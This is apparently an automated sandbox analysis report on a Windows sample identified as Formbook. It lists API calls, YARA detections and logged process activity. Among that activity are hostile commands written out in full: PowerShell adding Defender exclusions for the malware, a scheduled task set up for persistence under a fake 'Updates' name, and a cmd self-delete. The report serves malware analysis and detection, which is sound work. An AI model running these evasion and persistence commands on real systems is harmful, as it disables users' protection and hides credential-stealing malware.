          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0113B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0113A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0113AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139560 NtWriteFile,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0113A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0113A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01139670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011396D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FCB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FCAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FCA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FCA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AEA060 NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AEA110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AE9FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AE9F30 NtCreateFile,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 0_2_0181C2B0
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 0_2_01819990
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00401030
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0041E1A2
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00402D90
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00409E40
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00402FB0
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FF900
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01114120
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1002
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110B090
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011220A0
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C20A8
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C28EC
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C2B28
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112EBB0
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BDBD2
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C22AE
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C2D07
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F0D20
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C1D55
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01122581
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C25DD
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110D5E0
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110841F
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BD466
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C1FF1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BD616
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01116E30
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C2EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05051D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9B090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9D5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F80D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8F900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA6E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBEBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AEE1A2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AD2D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AD9E40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AD2FB0
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe 8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04F8B150 appears 35 times
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: String function: 010FB150 appears 35 times
          Source: Ms5nQdSz5l.exe, 00000000.00000002.272067090.000000000C130000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000002.272067090.000000000C130000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000000.223690013.0000000000CF2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInvalidCastException.exe> vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000002.242851987.0000000001380000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000002.270256208.000000000C030000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244358631.00000000030A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000009.00000002.376511036.00000000006D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInvalidCastException.exe> vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000009.00000003.244547580.000000000104F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000009.00000002.392045961.00000000030C3000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Ms5nQdSz5l.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: zFVxYeAVOjnwuB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@19/19@2/1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeFile created: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_01
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeFile created: C:\Users\user\AppData\Local\Temp\tmp7635.tmpJump to behavior
          Source: Ms5nQdSz5l.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Ms5nQdSz5l.exeVirustotal: Detection: 26%
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeFile read: C:\Users\user\Desktop\Ms5nQdSz5l.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Ms5nQdSz5l.exe 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Users\user\Desktop\Ms5nQdSz5l.exe C:\Users\user\Desktop\Ms5nQdSz5l.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Users\user\Desktop\Ms5nQdSz5l.exe C:\Users\user\Desktop\Ms5nQdSz5l.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
